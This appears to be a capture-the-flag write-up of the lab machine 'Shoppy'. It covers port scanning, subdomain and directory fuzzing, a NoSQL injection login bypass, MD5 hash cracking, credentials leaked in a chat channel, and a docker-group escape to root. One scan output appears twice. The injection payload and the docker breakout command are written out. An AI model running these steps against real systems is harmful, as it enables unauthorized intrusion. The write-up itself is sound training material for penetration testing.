Target IP: 10.129.227.233
Challenge Description: N/A.
Performing a TCP port scan using the command sudo nmap -sS 10.129.227.233 -p- returns the result shown above. By the looks of it, there are three TCP ports open on the target machine: SSH, HTTP, and another -- I assume -- HTTP application on the higher port. Time to identify its services using an aggressive scan.
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Shoppy]
└─$ sudo nmap -sV -A 10.129.227.233 -p 22,80,9093
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-18 10:24 UTC
Nmap scan report for 10.129.227.233
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
9093/tcp open copycat?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Sat, 18 May 2024 10:24:32 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 6
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 6
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 1.2103e-05
| go_gc_duration_seconds{quantile="0.25"} 4.769e-05
|_ go_gc_dura
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9093-TCP:V=7.94%I=7%D=5/18%Time=664881DF%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,2A60,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/plain;\x20version=0\.0\.4;\x20charset=utf-8\r\nDate:\x20Sat,\x2
SF:018\x20May\x202024\x2010:24:32\x20GMT\r\n\r\n#\x20HELP\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x
SF:20generated\x20by\x20the\x20Go\x20runtime\.\n#\x20TYPE\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20counter\ngo_gc_cycles_automatic_gc_cycles_
SF:total\x206\n#\x20HELP\x20go_gc_cycles_forced_gc_cycles_total\x20Count\x
SF:20of\x20completed\x20GC\x20cycles\x20forced\x20by\x20the\x20application
SF:\.\n#\x20TYPE\x20go_gc_cycles_forced_gc_cycles_total\x20counter\ngo_gc_
SF:cycles_forced_gc_cycles_total\x200\n#\x20HELP\x20go_gc_cycles_total_gc_
SF:cycles_total\x20Count\x20of\x20all\x20completed\x20GC\x20cycles\.\n#\x2
SF:0TYPE\x20go_gc_cycles_total_gc_cycles_total\x20counter\ngo_gc_cycles_to
SF:tal_gc_cycles_total\x206\n#\x20HELP\x20go_gc_duration_seconds\x20A\x20s
SF:ummary\x20of\x20the\x20pause\x20duration\x20of\x20garbage\x20collection
SF:\x20cycles\.\n#\x20TYPE\x20go_gc_duration_seconds\x20summary\ngo_gc_dur
SF:ation_seconds{quantile=\"0\"}\x201\.2103e-05\ngo_gc_duration_seconds{qu
SF:antile=\"0\.25\"}\x204\.769e-05\ngo_gc_dura")%r(HTTPOptions,4B1E,"HTTP/
SF:1\.0\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20version=0\.0\.4;\x
SF:20charset=utf-8\r\nDate:\x20Sat,\x2018\x20May\x202024\x2010:24:32\x20GM
SF:T\r\n\r\n#\x20HELP\x20go_gc_cycles_automatic_gc_cycles_total\x20Count\x
SF:20of\x20completed\x20GC\x20cycles\x20generated\x20by\x20the\x20Go\x20ru
SF:ntime\.\n#\x20TYPE\x20go_gc_cycles_automatic_gc_cycles_total\x20counter
SF:\ngo_gc_cycles_automatic_gc_cycles_total\x206\n#\x20HELP\x20go_gc_cycle
SF:s_forced_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x2
SF:0forced\x20by\x20the\x20application\.\n#\x20TYPE\x20go_gc_cycles_forced
SF:_gc_cycles_total\x20counter\ngo_gc_cycles_forced_gc_cycles_total\x200\n
SF:#\x20HELP\x20go_gc_cycles_total_gc_cycles_total\x20Count\x20of\x20all\x
SF:20completed\x20GC\x20cycles\.\n#\x20TYPE\x20go_gc_cycles_total_gc_cycle
SF:s_total\x20counter\ngo_gc_cycles_total_gc_cycles_total\x206\n#\x20HELP\
SF:x20go_gc_duration_seconds\x20A\x20summary\x20of\x20the\x20pause\x20dura
SF:tion\x20of\x20garbage\x20collection\x20cycles\.\n#\x20TYPE\x20go_gc_dur
SF:ation_seconds\x20summary\ngo_gc_duration_seconds{quantile=\"0\"}\x201\.
SF:2103e-05\ngo_gc_duration_seconds{quantile=\"0\.25\"}\x204\.769e-05\ngo_
SF:gc_dura");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 5.0 - 5.5 (96%), Linux 4.15 - 5.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 2.6.32 (94%), Linux 5.3 - 5.4 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 9093/tcp)
HOP RTT ADDRESS
1 18.70 ms 10.10.14.1
2 19.42 ms 10.129.227.233
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.02 seconds┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Shoppy]
└─$ sudo nmap -sV -A 10.129.227.233 -p 22,80,9093
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-18 10:24 UTC
Nmap scan report for 10.129.227.233
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
9093/tcp open copycat?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Sat, 18 May 2024 10:24:32 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 6
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 6
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 1.2103e-05
| go_gc_duration_seconds{quantile="0.25"} 4.769e-05
|_ go_gc_dura
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9093-TCP:V=7.94%I=7%D=5/18%Time=664881DF%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,2A60,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/plain;\x20version=0\.0\.4;\x20charset=utf-8\r\nDate:\x20Sat,\x2
SF:018\x20May\x202024\x2010:24:32\x20GMT\r\n\r\n#\x20HELP\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x
SF:20generated\x20by\x20the\x20Go\x20runtime\.\n#\x20TYPE\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20counter\ngo_gc_cycles_automatic_gc_cycles_
SF:total\x206\n#\x20HELP\x20go_gc_cycles_forced_gc_cycles_total\x20Count\x
SF:20of\x20completed\x20GC\x20cycles\x20forced\x20by\x20the\x20application
SF:\.\n#\x20TYPE\x20go_gc_cycles_forced_gc_cycles_total\x20counter\ngo_gc_
SF:cycles_forced_gc_cycles_total\x200\n#\x20HELP\x20go_gc_cycles_total_gc_
SF:cycles_total\x20Count\x20of\x20all\x20completed\x20GC\x20cycles\.\n#\x2
SF:0TYPE\x20go_gc_cycles_total_gc_cycles_total\x20counter\ngo_gc_cycles_to
SF:tal_gc_cycles_total\x206\n#\x20HELP\x20go_gc_duration_seconds\x20A\x20s
SF:ummary\x20of\x20the\x20pause\x20duration\x20of\x20garbage\x20collection
SF:\x20cycles\.\n#\x20TYPE\x20go_gc_duration_seconds\x20summary\ngo_gc_dur
SF:ation_seconds{quantile=\"0\"}\x201\.2103e-05\ngo_gc_duration_seconds{qu
SF:antile=\"0\.25\"}\x204\.769e-05\ngo_gc_dura")%r(HTTPOptions,4B1E,"HTTP/
SF:1\.0\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20version=0\.0\.4;\x
SF:20charset=utf-8\r\nDate:\x20Sat,\x2018\x20May\x202024\x2010:24:32\x20GM
SF:T\r\n\r\n#\x20HELP\x20go_gc_cycles_automatic_gc_cycles_total\x20Count\x
SF:20of\x20completed\x20GC\x20cycles\x20generated\x20by\x20the\x20Go\x20ru
SF:ntime\.\n#\x20TYPE\x20go_gc_cycles_automatic_gc_cycles_total\x20counter
SF:\ngo_gc_cycles_automatic_gc_cycles_total\x206\n#\x20HELP\x20go_gc_cycle
SF:s_forced_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x2
SF:0forced\x20by\x20the\x20application\.\n#\x20TYPE\x20go_gc_cycles_forced
SF:_gc_cycles_total\x20counter\ngo_gc_cycles_forced_gc_cycles_total\x200\n
SF:#\x20HELP\x20go_gc_cycles_total_gc_cycles_total\x20Count\x20of\x20all\x
SF:20completed\x20GC\x20cycles\.\n#\x20TYPE\x20go_gc_cycles_total_gc_cycle
SF:s_total\x20counter\ngo_gc_cycles_total_gc_cycles_total\x206\n#\x20HELP\
SF:x20go_gc_duration_seconds\x20A\x20summary\x20of\x20the\x20pause\x20dura
SF:tion\x20of\x20garbage\x20collection\x20cycles\.\n#\x20TYPE\x20go_gc_dur
SF:ation_seconds\x20summary\ngo_gc_duration_seconds{quantile=\"0\"}\x201\.
SF:2103e-05\ngo_gc_duration_seconds{quantile=\"0\.25\"}\x204\.769e-05\ngo_
SF:gc_dura");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 5.0 - 5.5 (96%), Linux 4.15 - 5.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 2.6.32 (94%), Linux 5.3 - 5.4 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 9093/tcp)
HOP RTT ADDRESS
1 18.70 ms 10.10.14.1
2 19.42 ms 10.129.227.233
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.02 secondsExecuting the command sudo nmap -sV -A 10.129.227.233 -p 22,80,9093 returns the result shown above. I notice the HTTP request to redirected to shoppy.htb. I will need to insert this hostname inside my /etc/hosts file. There is another interesting application on the higher port 9093. I will perform a subdomain enumeration before performing an enumeration.
I performed a subdomain enumeration using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/combined_subdomains.txt -H "Host: FUZZ.shoppy.htb" -u http://shoppy.htb -fw 5 and got a hit, as shown above. I used multiople wordlists before obtaining a hit. I will now insert the hostname mattermost.shoppy.htb inside my /etc/hosts file too.
Now my /etc/hosts contains the entry 10.129.227.233 mattermost.shoppy.htb shoppy.htb, as shown above. Time to enumerate.
Port 80: HTTP
The webpage above is displayed for this web application. I scanned the source-code of this webpage, but I did not find anything useful.
I used the command gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirb/big.txt -x html,php,txt to perform a directory search and obtained the result shown above. There are interesting entries such as /login. Time to check this out.
The webpage above is displayed for the /login page. Maybe I can try to login as the default credentials? I tried to login using default credentials such as admin:admin and admin:root, but I had no luck. Since this is a login page, maybe it is vulnerable to injection attacks? I tried SQL injection payloads, but I had no luck as the error message 504 Gateway Time-out was returned to me.
After browsing for NoSQL injection payloads, I managed to find the payload admin'||'1'='1'. I inserted this new payload inside the username field and deployed the request and got a hit, as shown above. The web application seems to be vulnerable to NoSQL injection attacks. I now have access to the web application. Right away, I notice it is possible to search for users.
I searched for the username admin and got a hit as shown above. I notice there is another button called Download export after searching for the user admin. Pressing the button returned the webpage shown below.
I managed to obtain the username and password hash of the user admin. However, there could be other users.
To check for all the users on this web application, I used the same payload admin'||'1==1 and obtained the result shown above. There are two users: admin and josh. Time to crack the password hashes. I copied both password hashes to a file called hash on my machine. Time to run john on them.
The password hashes seem to be in MD5 format. I used the command john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 and cracked one of the password hash and obtained the password remembermethisway, as shown above. This password seems to belong to the user josh. I tried to SSH into the target machine with this new credentials, but I had no luck. Time to enumerate the other web application over at mattermost.shoppy.htb.
Port 80: HTTP (mattermost.shoppy.htb)
The webpage above is displayed for this web application. I used default credentials such as admin:admin, but I had no luck. Time to use the new credentials instead.
And bingo! Now I have access to the web application as the user josh, as shown above. After some manual enumeration, I found three users on this web application: josh, jaeger, and jess. I also identified the application name & version is Mattermost Version 7.1.2. I searched on Google for vulnerabilities and found some interesting result. Time to enumerate further.
I notice there is a channel called Deploy Machine on the web application. This channel contains the credentials jaeger:Sh0ppyBest@pp!, as shown above. Now I have the credentials of the user jaeger. I used this new credentials against this same web application, but I had no luck. Time to test it against the SSH application instead.
And now I have a SSH shell on the target machine as the user jaeger. I managed to SSH into the target machine as the user jaeger and the password Sh0ppyBest@pp!, as shown above. Now I have a foothold on the target machine as the user jaeger :)
Running the command sudo -l shows the user jaeger can execute the binary /home/deploy/password-manager as the user deploy, as shown above.
I checked the contents of the directory at /home/deploy and obtained the result shown above. There are interesting files located at this directory. However, I have very little access to the contents. I tried to read the source-code of the password-manager.cpp, but I do not have the permission. However, I notice strings is available on the target machine.
Running the command strings password-manager, I checked for any useful strings used by the binary application and obtained the result shown above. But I was unable to locate the password. The application is made by the user josh and it seems to be asking for the master password. I tried the two passwords I obtained previously, but I had no luck. I can run Ghidra on it, but I can also use the different encoding flags offered by strings.
I executed the command strings -eb password-manager and obtained the string Sample, as shown above. Is this the hidden password?
I ran the command sudo -u deploy /home/deploy/password-manager and the text Sample as the password and got a hit, as shown above. The string Sample seems to be password for this password-manager application. Now I have the credentials deploy:Deploying@pp!, as shown above.
Using the command su deploy and the password Deploying@pp!, I managed to elevate my privileges to this new user deploy as shown above. Running the command id shows the interesting group docker, as shown above. To identify what docker image is present, I used the command docker images and identified it is using alpine. Obtaining a root shell is simple.
To obtain a root shell on the target machine as this user deploy, I executed the command docker run -v /:/mnt --rm -it alpine chroot /mnt sh as shown above. Now I have a root shell on the target machine :) GG.
The two flags are shown above.